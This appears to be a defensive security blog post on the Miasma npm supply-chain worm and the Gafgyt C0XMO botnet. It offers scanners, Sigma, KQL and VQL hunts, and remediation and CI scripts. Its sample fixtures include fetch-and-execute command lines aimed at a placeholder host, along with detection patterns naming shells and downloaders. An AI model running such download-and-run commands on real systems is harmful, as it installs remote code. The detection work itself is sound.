The latest Security Affairs malware newsletter (Round 101) highlights a disturbing trend in active threat landscapes: the weaponization of the software supply chain and the evolution of cross-platform IoT botnets. Defenders are currently facing the Miasma worm, delivered via a trojanized ai-sdk-ollama package, and a new variant of the Gafgyt botnet known as C0XMO, which features enhanced cross-platform propagation capabilities. These are not theoretical risks; they represent active, ongoing campaigns capable of devastating development pipelines and perimeter networks.
This post provides the technical analysis, detection logic, and remediation steps necessary to contain these threats immediately.
Technical Analysis
1. Miasma: The Supply Chain Worm
Attack Vector: Dependency Confusion / Typosquatting
Entry Point: ai-sdk-ollama (Trojanized npm Package)
Mechanism: The threat actor has published a malicious package mimicking a legitimate Ollama AI SDK. Upon installation via npm install, the package executes a malicious binding.gyp file.
How it Works:
binding.gyp is the build description that node-gyp consumes to compile native Node.js add-ons; when a package ships one and declares no install script of its own, npm runs node-gyp rebuild for it automatically. In this attack, the file contains shell commands that download and execute the Miasma worm. Because the commands run as part of the build lifecycle, the payload executes automatically during installation, often bypassing static analysis that looks at the package's JavaScript rather than at its build scripts.
Impact: Self-replication capabilities, credential theft, and potential lateral movement from developer workstations into the broader build environment.
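Because the build description is the execution vector, a defender can triage it directly. The following scanner is an added example (not code from the newsletter or from Security Arsenal): it parses binding.gyp files as the Python literals they are and flags the two places node-gyp will run a command from them, the `action` list of an `actions` entry and `<!(...)` / `<!@(...)` command expansions inside strings, plus long base64 runs. The two sample files and the `example.invalid` host are constructed for the example.

```python
"""Flag build-time command execution in binding.gyp files (added example).

GYP files are Python literals (dicts, lists, strings, '#' comments), so
ast.parse + ast.literal_eval reads them without executing anything.
"""
import ast
import re
import sys
from pathlib import Path

SHELLS = {"sh", "bash", "dash", "cmd", "cmd.exe", "powershell", "powershell.exe", "pwsh"}
DOWNLOADERS = {"curl", "wget", "tftp", "certutil", "bitsadmin"}
BASE64_BLOB = re.compile(r"[A-Za-z0-9+/]{80,}={0,2}")   # long encoded payload
EXPANSION = re.compile(r"<!@?\((.*)\)")                  # gyp command expansion
WORD = re.compile(r"[A-Za-z0-9_.]+")


def parse_gyp(text):
    """Parse a .gyp file as a literal; the parser discards comments for us."""
    return ast.literal_eval(ast.parse(text.strip(), mode="eval"))


def walk(node, path=()):
    """Yield (path, value) for every nested value, depth first."""
    yield path, node
    children = node.items() if isinstance(node, dict) else (
        enumerate(node) if isinstance(node, list) else ())
    for key, value in children:
        yield from walk(value, path + (key,))


def reasons_for(command_text):
    """Risky programs a command mentions: {'shell'}, {'downloader'}, both, or none."""
    words = set(WORD.findall(command_text.lower()))
    reasons = set()
    if words & SHELLS:
        reasons.add("shell")
    if words & DOWNLOADERS:
        reasons.add("downloader")
    return reasons


def scan_gyp_text(text):
    """Return (kind, detail) findings; an empty list means nothing suspicious."""
    try:
        tree = parse_gyp(text)
    except (SyntaxError, ValueError) as exc:
        return [("unparseable", f"{type(exc).__name__}: review manually")]
    findings = []
    for path, value in walk(tree):
        where = "/".join(map(str, path))
        if isinstance(value, dict) and isinstance(value.get("action"), list):
            command = " ".join(map(str, value["action"]))
            reasons = reasons_for(command)
            if reasons:
                findings.append(("action:" + "+".join(sorted(reasons)), f"{where}: {command}"))
        elif isinstance(value, str):
            expansion = EXPANSION.search(value)
            if expansion and reasons_for(expansion.group(1)):
                findings.append(("expansion", f"{where}: {value}"))
            if BASE64_BLOB.search(value):
                findings.append(("base64_blob", f"{where}: {value[:32]}..."))
    return findings


# Constructed sample: a typical, harmless native add-on build description.
BENIGN_GYP = r"""
{
  # include_dirs uses a command expansion, but only to ask node for a header path
  'targets': [{
    'target_name': 'addon',
    'sources': ['src/addon.cc'],
    'include_dirs': ["<!@(node -p \"require('node-addon-api').include\")"],
    'defines': ['NAPI_DISABLE_CPP_EXCEPTIONS'],
  }],
}
"""

# Constructed sample: a build step that fetches and runs a remote script, plus an
# embedded base64 blob (96 filler characters); example.invalid is a placeholder.
SUSPICIOUS_GYP = """
{
  'targets': [{
    'target_name': 'ollama_native',
    'sources': ['src/native.cc'],
    'actions': [{
      'action_name': 'prepare',
      'inputs': [],
      'outputs': ['prepared.txt'],
      'action': ['sh', '-c', 'curl -fsSL http://example.invalid/stage | sh'],
    }],
  }],
  'variables': {'blob': '%s'},
}
""" % ("QUFB" * 24)


def main(root):
    """Scan every binding.gyp below root (default: ./node_modules) and print findings."""
    for gyp in Path(root).rglob("binding.gyp"):
        for kind, detail in scan_gyp_text(gyp.read_text(errors="replace")):
            print(f"[!] {gyp}: {kind}: {detail}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else "node_modules")
```

Run it against a checkout's node_modules before a build agent touches it; a parse failure is itself worth a look, since a gyp file node-gyp cannot read has no legitimate reason to be there.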
2. Gafgyt Variant C0XMO: Cross-Platform Propagation
Target: IoT devices, Linux servers, and network infrastructure.
Mechanism: Gafgyt (also known as Bashlite) has historically targeted IoT devices via Telnet brute-forcing. The new C0XMO variant introduces cross-platform capabilities, likely utilizing compiled binaries for multiple architectures (ARM, MIPS, x86) to propagate beyond typical IoT devices into generic Linux environments.
Propagation: The variant scans for vulnerable services and exploits weak default credentials or specific unpatched vulnerabilities to spread. Once established, it enslaves the device in a DDoS botnet.
Detection & Response
To defend against these specific threats, Security Arsenal analysts recommend deploying the following detection rules and hunts.
SIGMA Rules
---
title: Potential Malicious npm Build Process - Miasma Worm
id: 8a4b2c9d-1e3f-4a5b-8c6d-7e8f9a0b1c2d
status: experimental
description: Detects suspicious child processes spawned by npm or node-gyp during package installation, indicative of malicious binding.gyp scripts like Miasma.
references:
    - https://securityaffairs.com/193609/breaking-news/security-affairs-malware-newsletter-round-101.html
author: Security Arsenal
date: 2026/04/06
tags:
    - attack.execution
    - attack.t1059.004
    - attack.initial_access
    - attack.t1199.001
logsource:
    category: process_creation
    product: windows
detection:
    selection_parent:
        ParentImage|contains:
            - '\node.exe'
            - '\npm.cmd'
            - '\node-gyp'
    selection_child:
        Image|endswith:
            - '\powershell.exe'
            - '\cmd.exe'
            - '\bash.exe'
    condition: all of selection_*
falsepositives:
    - Legitimate build scripts requiring shell access (rare)
level: high
---
title: Gafgyt C0XMO Botnet Download Pattern
id: 9b5c3d0e-2f4a-5b6c-9d7e-0f1a2b3c4d5e
status: experimental
description: Detects common Gafgyt C0XMO download and execution patterns involving wget/curl followed by chmod.
references:
    - https://securityaffairs.com/193609/breaking-news/security-affairs-malware-newsletter-round-101.html
author: Security Arsenal
date: 2026/04/06
tags:
    - attack.command_and_control
    - attack.t1105
logsource:
    category: process_creation
    product: linux
detection:
    selection_download:
        CommandLine|contains:
            - 'wget'
            - 'curl'
    selection_perms:
        CommandLine|contains:
            - 'chmod 777'
            - 'chmod +x'
    selection_exec:
        # Sigma's regular-expression modifier is 're' (the rule previously used a non-existent 'matches' modifier)
        CommandLine|re: '\./[a-zA-Z0-9]{6,}'
    condition: all of selection_*
falsepositives:
    - Administrator manual software installation
level: medium
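To see how `condition: all of selection_*` behaves on real events, here is an added example (not part of the original post) that applies both rules above to constructed process-creation events. Sigma's `contains` and `endswith` modifiers are case-insensitive, so the comparisons lowercase both sides; the `re` modifier is applied to the raw command line. The events, including the `example.invalid` host, are constructed fixtures.

```python
"""Apply the Miasma and Gafgyt C0XMO Sigma rules to sample events (added example)."""
import re

NPM_PARENTS = ("\\node.exe", "\\npm.cmd", "\\node-gyp")           # ParentImage|contains
SHELL_CHILDREN = ("\\powershell.exe", "\\cmd.exe", "\\bash.exe")  # Image|endswith
DOWNLOAD_TOKENS = ("wget", "curl")                                # CommandLine|contains
CHMOD_TOKENS = ("chmod 777", "chmod +x")                          # CommandLine|contains
EXEC_PATTERN = re.compile(r"\./[a-zA-Z0-9]{6,}")                  # CommandLine|re


def miasma_rule(event):
    """Windows rule: an npm/node/node-gyp parent AND a shell child, both required."""
    parent = event.get("ParentImage", "").lower()
    image = event.get("Image", "").lower()
    selection_parent = any(p in parent for p in NPM_PARENTS)
    selection_child = image.endswith(SHELL_CHILDREN)
    return selection_parent and selection_child


def gafgyt_rule(event):
    """Linux rule: downloader AND chmod AND ./<name> must all sit in one command line."""
    raw = event.get("CommandLine", "")
    cmd = raw.lower()
    selection_download = any(t in cmd for t in DOWNLOAD_TOKENS)
    selection_perms = any(t in cmd for t in CHMOD_TOKENS)
    selection_exec = EXEC_PATTERN.search(raw) is not None
    return selection_download and selection_perms and selection_exec


RULES = {
    "windows": ("Potential Malicious npm Build Process - Miasma Worm", miasma_rule),
    "linux": ("Gafgyt C0XMO Botnet Download Pattern", gafgyt_rule),
}


def run_rules(events):
    """Return (rule title, event id) for every event a rule matches."""
    hits = []
    for event in events:
        title, rule = RULES[event["product"]]
        if rule(event):
            hits.append((title, event["id"]))
    return hits


# Constructed events. 1 and 4 are the behaviours the rules describe; 6 is the
# admin-install false positive the Gafgyt rule's 'falsepositives' field warns about.
SAMPLE_EVENTS = [
    {"id": 1, "product": "windows",
     "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File build\prepare.ps1"},
    {"id": 2, "product": "windows",
     "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "Image": r"C:\BuildTools\VC\bin\cl.exe",
     "CommandLine": "cl.exe /c src\\addon.cc"},
    {"id": 3, "product": "windows",
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe"},
    {"id": 4, "product": "linux", "Image": "/bin/sh",
     "CommandLine": "sh -c \"cd /tmp; wget http://example.invalid/x86bin; chmod +x x86bin; ./x86bin\""},
    {"id": 5, "product": "linux", "Image": "/usr/bin/curl",
     "CommandLine": "curl -LO https://example.invalid/tool.tar.gz"},
    {"id": 6, "product": "linux", "Image": "/bin/bash",
     "CommandLine": "bash -c \"wget https://example.invalid/install.sh && chmod +x install.sh && ./install.sh\""},
]

if __name__ == "__main__":
    for title, event_id in run_rules(SAMPLE_EVENTS):
        print(f"[{title}] event {event_id}")
```

Event 5 shows why the three selections are ANDed: a plain download is not enough on its own, while event 6 shows the price of that design, since any one-liner that downloads, chmods and runs a script matches regardless of intent.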
KQL (Microsoft Sentinel)
// Hunt for Miasma indicators: npm / node-gyp spawning shells during package installation
// (on Windows npm.cmd and node-gyp.cmd are scripts run by cmd.exe, so also match the
// initiating command line rather than only the image name)
DeviceProcessEvents
| where InitiatingProcessFileName in~ ('npm.exe', 'node.exe', 'node-gyp.cmd', 'node-gyp')
    or InitiatingProcessCommandLine has_any ('npm', 'node-gyp', 'binding.gyp')
| where FileName in~ ('powershell.exe', 'pwsh.exe', 'cmd.exe', 'bash.exe', 'sh', 'bash')
| project Timestamp, DeviceName, AccountName, InitiatingProcessCommandLine, ProcessCommandLine, FileName
| order by Timestamp desc
Velociraptor VQL
-- Hunt for binding.gyp files in node_modules that were modified in the last 7 days
-- (Miasma hides its payload in the build description of the trojanized package)
SELECT OSPath, Size, Mtime, Mode
FROM glob(globs=['/home/**/node_modules/**/binding.gyp',
                 '/root/**/node_modules/**/binding.gyp',
                 '/usr/local/lib/**/node_modules/**/binding.gyp'])
WHERE Mtime > timestamp(epoch=now() - 7 * 24 * 3600)

-- Hunt for Gafgyt C0XMO processes: busybox, binaries running from world-writable
-- locations, or downloader command lines (each clause stands on its own; in VQL AND
-- binds tighter than OR, so mixing them without parentheses silently narrows the hunt)
SELECT Pid, Name, Exe, CreateTime, Username, CommandLine
FROM pslist()
WHERE Name =~ 'busybox'
   OR Exe =~ '^/(tmp|var/tmp|dev/shm)/'
   OR CommandLine =~ '(wget|curl|tftp)'
Remediation Script (Bash)
#!/bin/bash
# Remediation script for Miasma (ai-sdk-ollama) and basic Gafgyt hardening
set -u

echo "[*] Scanning for projects that depend on the malicious ai-sdk-ollama package..."
# Search project manifests (package.json) outside node_modules, so that npm uninstall
# runs from the project root rather than from inside an installed package.
find /home /root /usr/local/lib -path '*/node_modules' -prune -o \
     -name package.json -exec grep -l '"ai-sdk-ollama"' {} + 2>/dev/null \
  | while IFS= read -r file; do
    DIR=$(dirname "$file")
    echo "[!] Found ai-sdk-ollama in $DIR"
    # Remove the malicious package (subshell, so the working directory is unchanged)
    (cd "$DIR" && npm uninstall ai-sdk-ollama --force) \
        && echo "[*] Removed package from $DIR"
done

echo "[*] Checking for suspicious binding.gyp content..."
# Look for shell execution, downloaders or long base64 strings in gyp files
find /home /root /usr/local/lib -path '*/node_modules/*' -name binding.gyp \
     -exec grep -lE 'sh\.exec|/bin/sh|bash -c|powershell|curl |wget |[A-Za-z0-9+/]{80,}' {} + 2>/dev/null \
  | while IFS= read -r gyp; do
    echo "[!] Review $gyp"
done

echo "[*] Hardening against Gafgyt C0XMO propagation..."
# Disable the Telnet service used by Gafgyt for propagation, if it is not needed
# (requires root/sudo)
if [ "$EUID" -eq 0 ]; then
    echo "[*] Ensuring Telnet is disabled..."
    systemctl disable --now telnet.socket 2>/dev/null || true
else
    echo "[!] Root privileges required to disable Telnet services."
fi

echo "[+] Remediation check complete."
Remediation
For Miasma (npm Supply Chain)
- Immediate Removal: Run npm uninstall ai-sdk-ollama in all affected environments. This package is currently identified as the primary vector for the Miasma worm.
- Audit Node Modules: Developers should recursively check node_modules folders for the presence of binding.gyp files that contain shell execution commands (sh.exec, powershell.exe).
- Dependency Review: Implement strict package-lock.json integrity checking. Ensure CI/CD pipelines are configured to fail builds if new dependencies are introduced without explicit security review.
- Network Egress: Restrict outbound internet access from build agents. Build systems should not need to download arbitrary binaries or initiate shell connections to the internet.
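The dependency-review step above can be enforced mechanically. The following CI gate is an added example (not tooling from Security Arsenal or npm): it compares the committed package-lock.json with the one a pull request produces and fails the build when a dependency appears, changes its integrity hash, lacks one, resolves from outside the registry, or carries lifecycle scripts. It reads the lockfile v2/v3 `packages` map, where keys are `node_modules/<name>` paths and `hasInstallScript` marks packages with install scripts. The two lockfiles are constructed; versions, hashes and the git URL are placeholders, and only the package name ai-sdk-ollama comes from the newsletter.

```python
"""Fail CI when a pull request introduces unreviewed npm dependencies (added example)."""
import json
import sys

NPM_REGISTRY = "https://registry.npmjs.org/"
# Finding kinds that block a merge until a human has reviewed them
BLOCKING = {"new_dependency", "integrity_changed", "missing_integrity",
            "non_registry_source", "install_script"}


def _packages(lock):
    """The lockfile's 'packages' map without the "" entry that describes the root project."""
    return {path: meta for path, meta in lock.get("packages", {}).items() if path}


def _name(path):
    return path.rsplit("node_modules/", 1)[-1]


def review_lockfile(base, proposed, registry=NPM_REGISTRY):
    """Return (kind, name, version) findings for the proposed lockfile relative to base."""
    old, new = _packages(base), _packages(proposed)
    findings = []
    for path, meta in new.items():
        name, version = _name(path), meta.get("version", "?")
        if path not in old:
            findings.append(("new_dependency", name, version))
        elif meta.get("integrity") != old[path].get("integrity"):
            findings.append(("integrity_changed", name, version))
        # Workspace links legitimately have no integrity; everything else must
        if not meta.get("integrity") and not meta.get("link"):
            findings.append(("missing_integrity", name, version))
        resolved = meta.get("resolved", "")
        if resolved and not resolved.startswith(registry):
            findings.append(("non_registry_source", name, version))
        if meta.get("hasInstallScript"):
            findings.append(("install_script", name, version))
    for path, meta in old.items():
        if path not in new:
            findings.append(("removed_dependency", _name(path), meta.get("version", "?")))
    return findings


def gate(findings):
    """CI exit status: 1 when any finding needs review before merge, else 0."""
    return 1 if any(kind in BLOCKING for kind, _, _ in findings) else 0


# Constructed lockfiles (versions, hashes and URLs are placeholders).
BASE_LOCK = {
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app", "dependencies": {"ollama": "^1.0.0"}},
        "node_modules/ollama": {
            "version": "1.0.0",
            "resolved": NPM_REGISTRY + "ollama/-/ollama-1.0.0.tgz",
            "integrity": "sha512-PLACEHOLDERBASE"},
    },
}
PROPOSED_LOCK = {
    "name": "demo-app", "lockfileVersion": 3,
    "packages": {
        "": {"name": "demo-app",
             "dependencies": {"ollama": "^1.0.0", "ai-sdk-ollama": "^0.0.0",
                              "left-pad-fork": "git+https://example.invalid/fork.git"}},
        "node_modules/ollama": BASE_LOCK["packages"]["node_modules/ollama"],
        "node_modules/ai-sdk-ollama": {          # new, and it runs a lifecycle script
            "version": "0.0.0-placeholder",
            "resolved": NPM_REGISTRY + "ai-sdk-ollama/-/ai-sdk-ollama-0.0.0-placeholder.tgz",
            "integrity": "sha512-PLACEHOLDERNEW",
            "hasInstallScript": True},
        "node_modules/left-pad-fork": {          # new, from git, no integrity hash
            "version": "1.0.0",
            "resolved": "git+https://example.invalid/fork.git#PLACEHOLDERCOMMIT"},
    },
}

if __name__ == "__main__":
    if len(sys.argv) == 3:
        with open(sys.argv[1]) as base_file, open(sys.argv[2]) as proposed_file:
            base, proposed = json.load(base_file), json.load(proposed_file)
    else:
        base, proposed = BASE_LOCK, PROPOSED_LOCK
    result = review_lockfile(base, proposed)
    for kind, name, version in result:
        print(f"[{kind}] {name}@{version}")
    sys.exit(gate(result))
```

Wire it in as `python review_lock.py package-lock.json.base package-lock.json` in the pipeline, with the base copy taken from the target branch; a non-zero exit blocks the merge until someone has looked at the listed packages.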
For Gafgyt C0XMO (IoT/Linux)
- Credential Hygiene: Change default credentials on all IoT devices and Linux servers exposed to the network. Gafgyt variants propagate primarily via brute-force on Telnet/SSH.
- Disable Unused Services: Ensure Telnet (port 23) is disabled and blocked at the firewall level. Use SSH only with key-based authentication.
- Segmentation: Isolate IoT devices on a separate VLAN. IoT devices should not have unrestricted access to the internal network or the internet.